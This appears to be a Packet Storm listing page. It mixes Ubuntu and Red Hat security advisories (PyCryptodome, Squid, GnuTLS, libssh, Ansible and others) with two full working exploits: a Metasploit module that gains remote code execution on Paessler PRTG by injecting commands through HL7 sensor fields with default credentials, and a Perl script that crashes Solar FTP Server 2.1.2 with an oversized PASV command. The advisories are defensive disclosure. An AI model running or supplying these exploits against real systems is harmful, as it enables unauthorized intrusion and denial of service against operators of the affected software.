Ubuntu Security Notice 6595-1 - It was discovered that PyCryptodome had a timing side-channel when performing OAEP decryption. A remote attacker could possibly use this issue to recover sensitive information.

    ==========================================================================Ubuntu Security Notice USN-6595-1January 23, 2024pycryptodome vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:PyCryptodome could be made to expose sensitive information.Software Description:- pycryptodome: Cryptographic Python libraryDetails:It was discovered that PyCryptodome had a timing side-channel whenperforming OAEP decryption. A remote attacker could possibly use this issueto recover sensitive information.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   python3-pycryptodome            3.11.0+dfsg1-3ubuntu0.1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6595-1   CVE-2023-52323Package Information:   https://launchpad.net/ubuntu/+source/pycryptodome/3.11.0+dfsg1-3ubuntu0.1

Ubuntu Security Notice USN-6595-1

Ubuntu Security Notice 6594-1 - Joshua Rogers discovered that Squid incorrectly handled HTTP message processing. A remote attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service. Joshua Rogers discovered that Squid incorrectly handled Helper process management. A remote attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service. Joshua Rogers discovered that Squid incorrectly handled HTTP request parsing. A remote attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6594-1  
January 23, 2024

squid vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Squid.

Software Description:  
- squid: Web proxy cache server

Details:

Joshua Rogers discovered that Squid incorrectly handled HTTP message  
processing. A remote attacker could possibly use this issue to cause  
Squid to crash, resulting in a denial of service. (CVE-2023-49285)

Joshua Rogers discovered that Squid incorrectly handled Helper process  
management. A remote attacker could possibly use this issue to cause  
Squid to crash, resulting in a denial of service. (CVE-2023-49286)

Joshua Rogers discovered that Squid incorrectly handled HTTP request  
parsing. A remote attacker could possibly use this issue to cause  
Squid to crash, resulting in a denial of service. (CVE-2023-50269)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   squid                           6.1-2ubuntu1.2

Ubuntu 23.04:  
   squid                           5.7-1ubuntu3.2

Ubuntu 22.04 LTS:  
   squid                           5.7-0ubuntu0.22.04.3

Ubuntu 20.04 LTS:  
   squid                           4.10-1ubuntu1.9

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6594-1  
   CVE-2023-49285, CVE-2023-49286, CVE-2023-50269

Package Information:  
   https://launchpad.net/ubuntu/+source/squid/6.1-2ubuntu1.2  
   https://launchpad.net/ubuntu/+source/squid/5.7-1ubuntu3.2  
   https://launchpad.net/ubuntu/+source/squid/5.7-0ubuntu0.22.04.3  
   https://launchpad.net/ubuntu/+source/squid/4.10-1ubuntu1.9

Ubuntu Security Notice USN-6594-1

Ubuntu Security Notice 6593-1 - It was discovered that GnuTLS had a timing side-channel when processing malformed ciphertexts in RSA-PSK ClientKeyExchange. A remote attacker could possibly use this issue to recover sensitive information. It was discovered that GnuTLS incorrectly handled certain certificate chains with a cross-signing loop. A remote attacker could possibly use this issue to cause GnuTLS to crash, resulting in a denial of service. This issue only affected Ubuntu 22.04 LTS, Ubuntu 23.04, and Ubuntu 23.10.

==========================================================================  
Ubuntu Security Notice USN-6593-1  
January 22, 2024

gnutls28 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in GnuTLS.

Software Description:  
- gnutls28: GNU TLS library

Details:

It was discovered that GnuTLS had a timing side-channel when processing  
malformed ciphertexts in RSA-PSK ClientKeyExchange. A remote attacker could  
possibly use this issue to recover sensitive information. (CVE-2024-0553)

It was discovered that GnuTLS incorrectly handled certain certificate  
chains with a cross-signing loop. A remote attacker could possibly use this  
issue to cause GnuTLS to crash, resulting in a denial of service. This  
issue only affected Ubuntu 22.04 LTS, Ubuntu 23.04, and Ubuntu 23.10.  
(CVE-2024-0567)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libgnutls30                     3.8.1-4ubuntu1.2

Ubuntu 23.04:  
   libgnutls30                     3.7.8-5ubuntu1.2

Ubuntu 22.04 LTS:  
   libgnutls30                     3.7.3-4ubuntu1.4

Ubuntu 20.04 LTS:  
   libgnutls30                     3.6.13-2ubuntu1.10

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6593-1  
   CVE-2024-0553, CVE-2024-0567

Package Information:  
   https://launchpad.net/ubuntu/+source/gnutls28/3.8.1-4ubuntu1.2  
   https://launchpad.net/ubuntu/+source/gnutls28/3.7.8-5ubuntu1.2  
   https://launchpad.net/ubuntu/+source/gnutls28/3.7.3-4ubuntu1.4  
   https://launchpad.net/ubuntu/+source/gnutls28/3.6.13-2ubuntu1.10

Ubuntu Security Notice USN-6593-1

Ubuntu Security Notice 6592-1 - It was discovered that libssh incorrectly handled the ProxyCommand and the ProxyJump features. A remote attacker could possibly use this issue to inject malicious code into the command of the features mentioned through the hostname parameter. It was discovered that libssh incorrectly handled return codes when performing message digest operations. A remote attacker could possibly use this issue to cause libssh to crash, obtain sensitive information, or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6592-1  
January 22, 2024

libssh vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in libssh.

Software Description:  
- libssh: A tiny C SSH library

Details:

It was discovered that libssh incorrectly handled the ProxyCommand and the  
ProxyJump features. A remote attacker could possibly use this issue to  
inject malicious code into the command of the features mentioned through  
the hostname parameter. (CVE-2023-6004)

It was discovered that libssh incorrectly handled return codes when  
performing message digest operations. A remote attacker could possibly use  
this issue to cause libssh to crash, obtain sensitive information, or  
execute arbitrary code. (CVE-2023-6918)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libssh-4                        0.10.5-3ubuntu1.2

Ubuntu 23.04:  
   libssh-4                        0.10.4-2ubuntu0.3

Ubuntu 22.04 LTS:  
   libssh-4                        0.9.6-2ubuntu0.22.04.3

Ubuntu 20.04 LTS:  
   libssh-4                        0.9.3-2ubuntu2.5

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6592-1  
   CVE-2023-6004, CVE-2023-6918

Package Information:  
   https://launchpad.net/ubuntu/+source/libssh/0.10.5-3ubuntu1.2  
   https://launchpad.net/ubuntu/+source/libssh/0.10.4-2ubuntu0.3  
   https://launchpad.net/ubuntu/+source/libssh/0.9.6-2ubuntu0.22.04.3  
   https://launchpad.net/ubuntu/+source/libssh/0.9.3-2ubuntu2.5

Ubuntu Security Notice USN-6592-1

Logwatch analyzes and reports on unix system logs. It is a customizable and pluggable log monitoring system which will go through the logs for a given period of time and make a customizable report. It should work right out of the package on most systems.

Logwatch 7.10

This Metasploit module exploits an authenticated remote code execution vulnerability in PRTG.

    class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::Retry  def initialize(info = {})    super(      update_info(        info,        'Name' => 'PRTG CVE-2023-32781 Authenticated RCE',        'Description' => %q{          Authenticated RCE in Paessler PRTG        },        'License' => MSF_LICENSE,        'Author' => ['Kevin Joensen <kevin[at]baldur.dk>'],        'References' => [          [ 'URL', 'https://baldur.dk/blog/prtg-rce.html'],          [ 'CVE', '2023-32781']        ],        'DisclosureDate' => '2023-08-09',        'Platform' => 'win',        'Arch' => [ ARCH_X86, ARCH_X64 ],        'Targets' => [          [            'Windows_Fetch',            {              'Arch' => [ ARCH_CMD ],              'Platform' => 'win',              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },              'Type' => :win_fetch            }          ],          [            'Windows_CMDStager',            {              'Arch' => [ ARCH_X64, ARCH_X86 ],              'Platform' => 'win',              'Type' => :win_cmdstager,              'CmdStagerFlavor' => [ 'psh_invokewebrequest' ]            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {},        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new(          'USERNAME',          [ true, 'The username to authenticate with', 'prtgadmin' ]        ),        OptString.new(          'PASSWORD',          [ true, 'The password to authenticate with', 'prtgadmin' ]        ),        OptString.new(          'TARGETURI',          [ true, 'The URI for the PRTG web interface', '/' ]        )      ]    )  end  def check    begin      res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(datastore['URI'], '/index.htm')      })    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError      return CheckCode::Unknown    ensure      disconnect    end    if res && res.code == 200      prtg_server_header = res.headers['Server']      if (prtg_server_header.include? 'PRTG') || (html.to_s.include? 'PRTG')        return CheckCode::Detected      end    end    return CheckCode::Unknown  end  def exploit    @sensors_to_delete = []    connect    case target['Type']    when :win_cmdstager      execute_cmdstager    when :win_fetch      execute_command(payload.encoded)    end  end  def on_new_session(client)    super    @sensors_to_delete.each do |sensor_id|      delete_sensor_by_id(sensor_id)    end    print_good('Session created')  end  def execute_command(cmd, _opts = {})    print_status('Running PRTG RCE exploit')    authenticate_prtg    bat_file_name = write_bat_file_to_disk(cmd)    run_bat_file_from_disk(bat_file_name)    print_status('Exploit done')    handler  end  def authenticate_prtg    print_status('Authenticating against PRTG')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'public', 'checklogin.htm'),      'keep_cookies' => true,      'vars_post' => {        'username' => datastore['USERNAME'],        'password' => datastore['PASSWORD']      }    })    unless res      fail_with(Failure::NoAccess, 'Failure to connect to PRTG')    end    if res && res.code == 302 && res.get_cookies      print_good('Successfully authenticated against PRTG')    else      fail_with(Failure::NoAccess, 'Failure to authenticate against PRTG')    end  end  def get_csrf_token    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'welcome.htm'),      'keep_cookies' => true    })    if res.nil? || res.body.nil?      fail_with(Failure::NoAccess, 'Page with CSRF token not available')    end    regex = /csrf-token" content="([^"]+)"/    token = res.body[regex, 1]    print_status("Extracted csrf token: #{token}")    token  end  def delete_sensor_by_id(sensor_id)    print_status("Deleting sensor #{sensor_id}")    csrf_token = get_csrf_token    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api', 'deleteobject.htm'),      'keep_cookies' => true,      'headers' => {        'anti-csrf-token' => csrf_token,        'X-Requested-With' => 'XMLHttpRequest'      },      'vars_post' => {        id: sensor_id,        approve: 1      }    })    if res.nil? || res.body.nil?      fail_with(Failure::NoAccess, 'Sensor deletion failed')    end  end  def get_created_sensor_id(sensor_name)    print_status('Fetching created sensor id')    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'controls', 'deviceoverview.htm'),      'keep_cookies' => true,      'vars_get' => {        'id' => 40      }    })    if res.nil? || res.body.nil?      fail_with(Failure::NoAccess, 'Page with sensorid not available')    end    regex = /id=([0-9]+)">#{sensor_name}/    sensor_id = res.body[regex, 1]    print_status("Extracted sensor_id: #{sensor_id}")    sensor_id  end  def run_sensor_with_id(sensor_id)    csrf_token = get_csrf_token    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api', 'scannow.htm'),      'keep_cookies' => true,      'headers' => {        'anti-csrf-token' => csrf_token,        'X-Requested-With' => 'XMLHttpRequest'      },      'vars_post' => {        id: sensor_id      }    })    if res && res.code == 200      print_good('Sensor started running')    else      fail_with(Failure::NoAccess, 'Failure to run sensor')    end  end  def write_bat_file_to_disk(cmd)    # Uses the HL7Sensor for writing a .bat file to the disk    cmd = cmd.gsub! '\\', '\\\\\\'    print_status('Writing .bat to disk')    csrf_token = get_csrf_token    # Generate a random sensor name    sensor_name = Rex::Text.rand_text_alphanumeric(8..10)    bat_file_name = "#{Rex::Text.rand_text_alphanumeric(8..10)}.bat"    # Clean up the .bat file    cmd = "#{cmd} & del %0"    print_status("Generated sensor_name #{sensor_name}")    print_status("Generated bat_file_name #{bat_file_name}")    params = {      'name_' => sensor_name,      'parenttags_' => '',      'tags_' => 'dicom hl7',      'priority_' => '3',      'port_' => '104',      'timeout_' => '60',      'override_' => '0',      'sendapp_' => Rex::Text.rand_text_alphanumeric(4..5),      'sendfac_' => Rex::Text.rand_text_alphanumeric(4..5),      'recvapp_' => Rex::Text.rand_text_alphanumeric(4..5),      'recvfac_' => "#{Rex::Text.rand_text_alphanumeric(4..5)}\" -debug=\"..\\Custom Sensors\\EXE\\#{bat_file_name}\" -recvapp=\"#{Rex::Text.rand_text_alphanumeric(4..5)}",      'hl7file_' => "ADT_& #{cmd} & A08.hl7|ADT_A08.hl7||",      'hl7filename' => '',      'intervalgroup' => ['0', '1'],      'interval_' => '60|60 seconds',      'errorintervalsdown_' => '1',      'inherittriggers' => '1',      'id' => '40',      'sensortype' => 'hl7',      'tmpid' => '2',      'anti-csrf-token' => csrf_token    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'addsensor5.htm'),      'keep_cookies' => true,      'vars_post' => params    })    unless res      fail_with(Failure::NoAccess, 'Failure to connect to PRTG')    end    if res && res.code == 302      print_good('HL7 Sensor succesfully created')    else      fail_with(Failure::NoAccess, 'Failure to create HL7 sensor')    end    # Actually creating the sensor can take 1-2 seconds    print_status('Checking for sensor creation')    sensor_id = retry_until_truthy(timeout: 10) do      get_created_sensor_id(sensor_name)    end    print_status('Requesting HL7 Sensor to initiate scan')    run_sensor_with_id(sensor_id)    @sensors_to_delete.push(sensor_id)    print_good('.bat file written to disk')    bat_file_name  end  def run_bat_file_from_disk(bat_file_name)    print_status("Running the .bat file: #{bat_file_name}")    csrf_token = get_csrf_token    sensor_name = Rex::Text.rand_text_alphanumeric(8..10)    params = {      'name_' => sensor_name,      'parenttags_' => '',      'tags_' => 'exesensor',      'priority_' => '3',      'scriptplaceholdergroup' => '1',      'scriptplaceholder1description_' => '',      'scriptplaceholder1_' => '',      'scriptplaceholder2description_' => '',      'scriptplaceholder2_' => '',      'scriptplaceholder3description_' => '',      'scriptplaceholder3_' => '',      'scriptplaceholder4description_' => '',      'scriptplaceholder4_' => '',      'scriptplaceholder5description_' => '',      'scriptplaceholder5_' => '',      'exefile_' => "#{bat_file_name}|#{bat_file_name}||",      'exefilelabel' => '',      'exeparams_' => '',      'environment_' => '0',      'usewindowsauthentication_' => '0',      'mutexname_' => '',      'timeout_' => '60',      'valuetype_' => '0',      'channel_' => 'Value',      'unit_' => '#',      'monitorchange_' => '0',      'writeresult_' => '0',      'intervalgroup' => '0',      'interval_' => '43200|12 hours',      'errorintervalsdown_' => '1',      'inherittriggers' => '1',      'id' => '40',      'sensortype' => 'exe',      'tmpid' => '6',      'anti-csrf-token' => csrf_token    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'addsensor5.htm'),      'keep_cookies' => true,      'vars_post' => params    })    unless res      fail_with(Failure::NoAccess, 'Failure to connect to PRTG')    end    if res && res.code == 302      print_status('EXE Script sensor created')    else      fail_with(Failure::NoAccess, 'Failure to create EXE Script sensor')    end    print_status('Checking for sensor creation')    sensor_id = retry_until_truthy(timeout: 10) do      get_created_sensor_id(sensor_name)    end    run_sensor_with_id(sensor_id)    @sensors_to_delete.push(sensor_id)    print_good('Exploit completed. Waiting for payload')  endend

PRTG Authenticated Remote Code Execution

Solar FTP Server version 2.1.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 23 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1o4xTt67bUJYAAKm0pqNIG99ly--xRQBp/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=U9nH6gqyT88

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The FTP server does not correctly handle the amount of data or bytes sent.  
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

print "[+] Connecting to $ip:$port\n";  
my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n";

$s->send("USER anon\r\n");  
my $response = <$s>;  
print $response;  
$s->send("PASS anon\r\n");  
$response = <$s>;  
print $response;  
$s->send("SYST\r\n");  
$response = <$s>;  
print $response;  
sleep(2);  
$s->send("PASV " . "\x41"x6631 . "\r\n");  
sleep(3);  
$response = <$s>;  
print $response;  
$response = <$s>;  
print $response;  
print ">>> Sending second payload\n";  
$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");  
$response = <$s>;  
print $response;  
sleep(2);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                                                                    #\n";        
      print "#             Solar FTP Server 2.1.2 - PASV - Denied of Service      #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Solar FTP Server 2.1.2 Denial Of Service

Red Hat Security Advisory 2024-0332-03 - Updated images are now available for Red Hat Advanced Cluster Security 4.1.6. The updated images includes security fixes.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0332.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: ACS 4.1 enhancement updateAdvisory ID:        RHSA-2024:0332-03Product:            Red Hat Advanced Cluster Security for KubernetesAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0332Issue date:         2024-01-22Revision:           03CVE Names:          CVE-2023-5868====================================================================Summary: Updated images are now available for Red Hat Advanced Cluster Security 4.1.6. The updated images includes security fixes.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This release of RHACS 4.1 fixes PostgreSQL vulnerabilities in the central, central-db, and scanner-db containers.Solution:CVEs:CVE-2023-5868References:https://access.redhat.com/security/updates/classification/#importanthttps://docs.openshift.com/acs/4.1/release_notes/41-release-notes.htmlhttps://bugzilla.redhat.com/show_bug.cgi?id=2228111https://bugzilla.redhat.com/show_bug.cgi?id=2247168https://bugzilla.redhat.com/show_bug.cgi?id=2247169https://bugzilla.redhat.com/show_bug.cgi?id=2247170https://issues.redhat.com/browse/ROX-21832

Red Hat Security Advisory 2024-0332-03

Red Hat Security Advisory 2024-0325-03 - Updated RHEL-7-based Middleware container images are now available. Issues addressed include code execution and deserialization vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0325.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Updated RHEL-7-based Middleware container images  
Advisory ID:        RHSA-2024:0325-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0325  
Issue date:         2024-01-22  
Revision:           03  
CVE Names:          CVE-2022-1471  
====================================================================

Summary: 

Updated RHEL-7-based Middleware container images are now available.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The RHEL-7-based Middleware Containers container images have been updated for the January 2024 OpenJDK Critical Patch Update (CPU).

Users of RHEL-7-based Middleware Containers container images are advised to upgrade to these updated images. Users of these images are also encouraged to rebuild all container images that depend on these images.

You can find images updated by this advisory in the Red Hat Container Catalog (see the References section).

Security Fix(es):

* SnakeYaml: Constructor Deserialization Remote Code Execution (CVE-2022-1471)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-1471

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/containers  
https://bugzilla.redhat.com/show_bug.cgi?id=2150009

Red Hat Security Advisory 2024-0325-03

Red Hat Security Advisory 2024-0322-03 - An update is now available for Red Hat Ansible Automation Platform 2.4. Issues addressed include a local file inclusion vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0322.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix UpdateAdvisory ID:        RHSA-2024:0322-03Product:            Red Hat Ansible Automation PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0322Issue date:         2024-01-22Revision:           03CVE Names:          CVE-2023-41040====================================================================Summary: An update is now available for Red Hat Ansible Automation Platform 2.4Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.Security Fix(es):* python3-gitpython/python39-gitpython: Blind local file inclusion (CVE-2023-41040)* python3-twisted/python39-twisted: disordered HTTP pipeline response in twisted.web (CVE-2023-46137)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional changes:* python3-dynaconf/python39-dynaconf has been updated to 3.1.12-2* python3-gitpython/python39-gitpython has been updated to 3.1.40* python3-twisted/python39-twisted has been updated to 23.10.0Solution:CVEs:CVE-2023-41040References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2246264https://bugzilla.redhat.com/show_bug.cgi?id=2247040

Source

Packet Storm